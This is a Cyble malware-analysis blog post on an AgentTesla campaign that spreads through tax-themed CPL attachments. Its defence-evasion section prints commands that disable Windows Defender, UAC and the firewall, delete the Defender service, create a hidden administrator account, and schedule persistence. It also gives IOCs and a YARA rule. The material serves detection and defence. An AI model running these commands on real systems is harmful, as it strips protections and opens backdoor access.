Cyble – AgentTesla Malware Targets Users With Malicious Control Panel File

Key Takeaways

The blog highlights a new infection chain for distributing AgenTesla RAT. It involves a spam email with a CPL file that, when executed, downloads a PowerShell script that injects AgentTesla malware in exe and MSbuild.exe.
The PowerShell scripts use obfuscated binary strings to hide malicious code.
For persistence, malicious VB Scripts are dropped at startup folders, and a new schedule task is created.
A .NET-based loader file is used to inject AgentTesla payload in the memory.

Executive Summary

Cyble Research and Intelligence Labs (CRIL) has recently observed an AgentTesla malware attack that employs a well-developed process with multiple stages. The campaign is designed to trick unsuspecting users into opening Tax related documents and accompanying control panel files (CPL).

The adversary leverages malicious CPL files to execute malicious PowerShell scripts and utilizes a custom obfuscated .NET loader to inject AgentTesla payload.

During the investigation, we discovered a malicious email with the subject Gorgees Ghada shared “Gorgees_Ghada_Tax_2021-2022.zip” with you. This email contains an attached archive file, which includes two files, one PDF and another CPL file, namely Gorgees_Ghada_Tax 2021.pdf and Gorgees_Ghada_Tax 2021.cpl.

This CPL file executes a PowerShell script to download another file from the URL hxxp://cawp1[.]blogspot[.]com/atom.xml. This newly downloaded file contains a .NET loader injecting AgentTesla remote access trojan (RAT) into system processes.

The figure below shows the spam email.

Figure 1 Spam Email 3 — Figure 1 – Spam Email

AgentTesla is a .NET-based information stealer that infiltrates computers and exfiltrates sensitive information. The main focus of the AgentTesla is credentials and personal information of victims. Additionally, Agent Tesla has capabilities such as keylogging, stealing clipboard data, file system access, and data exfiltration to the Command and Control (C&C) server.

Technical Details

The attack lifecycle comprises several distinct stages, each serving a specific purpose to achieve its goals. These stages encompass various techniques and methodologies to facilitate initial infection, establish persistence on the targeted system, evade detection by security measures, and employ process injection for further advancements.

The figure below shows the AgentTesla infection chain.

Figure 2 AgentTesla Infection Chain 1 — Figure 2 – AgentTesla Infection Chain

Initial Infection

The email attachment encompasses a malicious file named Gorgees_Ghada_Tax 2021.cpl. It is a CPL file. The SHA256 hash of this file is 72219e131476a429db3323631405429880f29bb3bbe655d31f1b3e37edd18303.

During our analysis, merely three security vendors successfully detected this malicious file, as shown in the figure below.

Figure 3 – Anti Virus Vendor Detection for Malicious CPL File

The Gorgees_Ghada_Tax 2021.cpl file operates similarly to regular executables, requiring only a double-click to initiate its execution. Within this file lies PowerShell code, responsible for fetching a malicious PowerShell script from a hardcoded URL cawp1[.]blogspot[.]com/atom.xml and subsequently executing it through the use of powershell.exe.

The figure below shows the code for downloading and executing the script.

Figure 7 Contents of the Dropped Sology. File 2 — Figure 4 – PowerShell Code Executed by CPL

The Downloaded powershell script contains several obfuscated binary strings. Various binary substrings are replaced with special characters like ‘*’ and ‘_’ for obfuscation. Once the script is executed, PowerShell undertakes a deobfuscation process, replacing the special characters with their original binary substrings, thereby revealing the actual content of the binary strings. Subsequently, these deobfuscated binary strings are transformed into additional PowerShell scripts, an executable, and a DLL file.

The figure below shows the downloaded malicious script.

Figure 5 Powershell Script Downloaded by the CPL File — Figure 5 – Powershell Script Downloaded by the CPL File

After being executed, the malicious PowerShell script drops three scripts into the C:ProgramDataphuddiupdate directory: AdobeUpdates.vbs, Clang.vbs, and Se**logy.!!!!!!!!!!!!!!!!. These scripts facilitate a series of malicious actions, which are elaborated on in the subsequent sections.

The figure below shows the files dropped by the malicious PowerShell script.

Figure 6 Scripts Dropped by the Malicious Powershell Script — Figure 6 – Scripts Dropped by the Malicious Powershell Script

Payload Injection

Within the script “Se**logy.!!!!!!!!!!!!!!!!”, two binary string variables, namely “BigBOSS” and “s**ybunbun”, are concealed through obfuscation. The variable BigBOSS corresponds to an obfuscated AgentTesla executable, while the variable “s**ybunbun” conceals yet another obfuscated PowerShell script.

The figure below shows contents of “Se**logy.!!!!!!!!!!!!!!!!” file.

Figure 7 – Contents of the Dropped Sology.~!!!!!!!!!!!!!!!!~ File

Subsequently, the PowerShell script undertakes a deobfuscation process on the string variable “s**ybunbun” and executes the underlying PowerShell script. This deobfuscated script includes a loader DLL file based on .NET, which is once again concealed in binary string format. The script performs deobfuscation on the binary string, subsequently converting it into a byte array to get the actual loader.

The figure below shows the script code to create Byte Array from Binary String.

Figure 8 Script to Deobfuscate .NET Loader — Figure 8 – Script to Deobfuscate .NET Loader

Upon generating the .NET loader binary, the script initializes a designated method, C, within namespace A and Class B of the .NET loader.

The figure below shows the method C of the .NET Loader DLL file.

Figure 9 Method C of .NET Loader DLL — Figure 9 – Method C of .NET Loader DLL

This DLL then engages in the process injection, which injects the AgentTesla executable into three distinct executables located at C:WindowsMicrosoft.NETFramework: v4.0.30319RegSvcs.exe, v2.0.50727RegSvcs.exe, and v3.5Msbuild.exe.

This process injection is accomplished by utilizing the Invoke method within the script, as shown below.

Figure 10 Script Performing Process Injection 3 — Figure 10 – Script Performing Process Injection

The ultimate injected payload is a 32-bit variant of the AgentTesla malware, with a SHA256 hash of 54ccee6fa601b22fc17e00f7bf48c9d33f103ea1d3ba6cc86986bfe19a624b4e.

Persistence

The malware employs both scheduled tasks and the Startup folder in its attempts to establish persistence. Within the downloaded PowerShell script, the command “schtasks /create /sc MINUTE /mo 200 /tn EWxdwwATE /F /tr “$KILKGGKGK C:ProgramDataphuddiupdateAdobeUpdates.vbs” is present. This command generates a scheduled task entry within the Task Scheduler. This entry outlines that the script AdobeUpdates.vbs located at C:ProgramDataphuddiupdate will be executed on a daily basis without a specific end date.

The figure below shows the task scheduler entry.

Figure 11 – Task Scheduler Entry for Persistence

Furthermore, to enhance its persistence, the PowerShell script drops two scripts, AdobeUpdates.vbs, and Clang.vbs, into the system’s startup folder. The startup folder is scanned upon starting the operating system, and any files within it are executed as part of the initialization process.

The figure below shows the start-up folder.

Figure 12 Startup Entry for Persistence — Figure 12 – Startup Entry for Persistence

Both scripts, AdobeUpdates.vbs and Clang.vbs, share a common code, differing solely in their respective download URLs. Encapsulated within these scripts is a PowerShell command intended for execution. The VBScripts contain powershell command to download the malicious payload from the hardcoded URL every time the system starts or at the time mentioned in the Scheduled task entry.

The figure below shows the complete code of the AdobeUpdates.vbs.

Figure 13 Contents of the AdobeUpdates.vbs Script — Figure 13 – Contents of the AdobeUpdates.vbs Script

Defense Evasion

In order to evade detection mechanisms, the initial PowerShell script utilizes an encoded binary string variable named AMSISSISISI. Within this variable, two binary strings are embedded, accompanied by code that stops the Windows Defender services and bypasses the Antimalware Scan Interface (AMSI).

The figure below shows the deobfuscated string AMSISSISISI.

Figure 14 Script to Disable Windows Defender — Figure 14 – Script to Disable Windows Defender

The variable AMI is an AMSI bypass script that tries to disable AMSI’s “amsiInitFailed” check by manipulating non-public, static fields in the “System.Management.Automation.AmsiUtils” class.

The Figure below shows the powershell command to bypass AMSI.

Figure 15 PowerShell for AMSI Bypass — Figure 15 – PowerShell for AMSI Bypass

Another variable, DEF, is a PowerShell script to manipulate windows defender settings. The script contains the exclusion of extensions, paths, processes, IPAddress, and other Windows Defender settings.

Excluded Extensions: .bat, .ppam, .xls, .docx, .bat, .exe, .vbs, .js.

Excluded Path: C:, D: and E:.

Excluded Processes: explorer.exe, kernel32.dll, aspnet_compiler.exe, cvtres.exe, CasPol.exe, csc.exe, Msbuild.exe, ilasm.exe, InstallUtil.exe, jsc.exe, Calc.exe, powershell.exe, rundll32.exe, conhost.exe, Cscript.exe, mshta.exe, cmd.exe, DefenderisasuckingAntivirus and wscript.exe.

The script modifies the following windows defender settings to impair defense:

Add-MpPreference -ExclusionIpAddress 127.0.0.1
Add-MpPreference -ThreatIDDefaultAction_Actions 6
Add-MpPreference -AttackSurfaceReductionRules_Ids 0
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Set-MpPreference -EnableControlledFolderAccess Disabled
Set-MpPreference -PUAProtection disable
Set-MpPreference -HighThreatDefaultAction 6 -Force
Set-MpPreference -ModerateThreatDefaultAction 6
Set-MpPreference -LowThreatDefaultAction 6
Set-MpPreference -SevereThreatDefaultAction 6
Set-MpPreference -ScanScheduleDay 8

Additionally, the script executes the following commands.

Command	Description
New-Ipublicroperty -Path HKLM:SoftwareMicrosoftWindowsCurrentVersionpoliciessystem -Name EnableLUA -PropertyType DWord -Value 0 -Force	PowerShell command to disable User Account Control (UAC) on the system.
Stop-Service -Name WinDefend -Confirm:$false -Force	PowerShell command forcefully stops the Windows Defender service without asking for confirmation and without waiting for dependent services or tasks to finish
Set-Service -Name WinDefend -StartupType Disabled	Command prevents the WinDefend service from automatically starting when the system starts up.
net user System32 /add	Command to create a new user account with the username “System32”
net user System32 123	Set the password for the user account with the username “System32” to “123”
net localgroup administrators System32 /add	Add “System32” to the “Administrators” local group on the system.
net localgroup “Remote Desktop Users” System32 /add	Add the account “System32” to the “Remote Desktop Users” local group on the system.
net stop WdNisSvc	Stop Windows Defender Network Inspection Service WdNisSvc service
sc delete windefend	Permanently delete the “windefend” service
netsh advfirewall set allprofiles state off	Turn off the Windows Firewall for all network profiles on the system

The figure below shows the script to impair defense.

The figure below shows the process tree of the AgentTesla Infection.

Figure 17 AgentTesla Process Tree — Figure 17 – AgentTesla Process Tree

Conclusion

The observed malware campaign demonstrates a sophisticated and multi-stage attack strategy. By disguising malicious content as a seemingly legitimate program, the adversaries aim to lure unsuspecting users into activating weaponized control panel files that execute PowerShell scripts and load the dangerous AgentTesla malware. The successful infiltration of AgentTesla allows attackers to conduct data theft and execute commands on compromised systems, posing significant security risks. Vigilance and robust security measures are imperative to combat this threat.

Our Recommendations

Implement strong email filtering solutions to detect and block spam emails, phishing attempts, and malicious attachments.
Refrain from opening untrusted links and email attachments without verifying their authenticity.
Use a reputed antivirus and Internet security software package on your connected devices, including PC, laptop, and mobile.
Refrain from opening untrusted links and email attachments without verifying their authenticity.

MITRE ATT&CK® Techniques

Tactic	Technique ID	Technique Name
Initial Access	T1566	Phishing
Execution	T1059 T1204	Command and Scripting Interpreter User Execution
Persistence	T1547.001 T1053.005	Startup Folder Scheduled Task/Job: Scheduled Task
Defense Evasion	T1140 T1562.001 T1562.004 T1562.006 T1562.007	Deobfuscate/Decode Files or Information Impair Defenses: Disable or Modify Tools Impair Defenses: Disable or Modify System Firewall Impair Defenses: Indicator Blocking Impair Defenses: Disable or Modify Cloud Firewall
Command and Control	T1071	Application Layer Protocol

Indicators of Compromise (IOCs)

Indicators	Indicator Type	Details
2220fb8ec2e0055ed544f3eccb953fdd 5ea9c0fbe63b1e6755504f932d6f53e1bb0aa280 72219e131476a429db3323631405429880f29bb3bbe655d31f1b3e37edd18303	MD5 SHA1 SHA256	Gorgees_Ghada_Tax 2022.cpl
cawp1[.]blogspot[.]com/atom.xml	URL	PowerShell script
b38639c1ca724c0f13496b3eb89e24a8 c898d455b9b0e34f530b6fa10bcb368eeaed29b2 e6d9f4326a2423f6a70d69ff50e3158d7684b166ecdc58f3b0c534318c4b9e36	MD5 SHA1 SHA256	AdobeUpdates.vbs
2dcdda94429cdbe8d1f0c4e4a9f04e36 d874a11d00aa240f837efd742deb028de79eaad0 a4e6a885d3c0f0b62a3b322e3210c63977f2a5a3d0cea5e0f5be51b3d73d4054	MD5 SHA1 SHA256	Clang.vbs
dc580fd8c70ed8d35c129cf4b45c7dc2 4fded1fc42e6cd755c9829b91825d6a2ce1a364c 3f778a91bd64a8130d52f3ecee3806838688a171b6bde05372a238a6e4aba2cd	MD5 SHA1 SHA256	Sexology.~!!!!!!!!!!!!!!!!~
8f9de3ce238e237cc649d2db9fe890af b3fb0379b4e2679c0c1fa350b7962c2f54dd068b 54ccee6fa601b22fc17e00f7bf48c9d33f103ea1d3ba6cc86986bfe19a624b4e	MD5 SHA1 SHA256	AgentTesla
4729b73425c811e8b9c4142504c7500d 4617ddabccc0aeb4ce669b370de3079410657fe0 38b41ad398e4807cb6153eebc0bfff248799ac94d842766d47c37d8a288b720e	MD5 SHA1 SHA256	.NET loader

Yara Rules

rule AgentTesla_CPL_Downloader

{

meta:

author = “Cyble”

description = “Detects AgentTesla CPL Downloader Files”

date = “2023-08-08”

os = “Windows”

threat_name = “AgentTesla”

severity = 100

reference_sample = “72219e131476a429db3323631405429880f29bb3bbe655d31f1b3e37edd18303”

strings:

$a = “blogspot.com/atom.xml’”

$b = “-ExecutionPolicy Bypass -c ”%s””

$c = “(‘{1}{0}’-f’calc’,’i’).replace(‘calc’,’eX’)”

condition:

all of them

}

Detection Guidance:

Due to its association with downloading harmful PowerShell code from the “blogspot.com/atom.xml” URL pattern, it is recommended to implement a security rule that halts the execution of the PowerShell.exe application in cases where the strings “blogspot.com/atom.xml’” and “.replace(‘calc’,’eX’)” are present in PowerShell command line. This restriction should be enforced exclusively when the origin of the PowerShell.exe process is traced back to rundll32.exe, with the rundll32.exe process initiated by control.exe

Disclaimer: The provided detection guidance rules are purely illustrative and should not be directly implemented in a production environment without proper testing, validation, and consideration of potential impacts on system performance and security. Always exercise caution when implementing security rules or policies, and ensure you fully understand the consequences of any changes made to your system or network.

Source: https://cyble.com/blog/agenttesla-malware-targets-users-with-malicious-control-panel-file/

Tags: VIRUS, MOBILE, EMAIL, PERSISTENCE, TROJAN, FIREWALL, INITIAL ACCESS, DEFENSE EVASION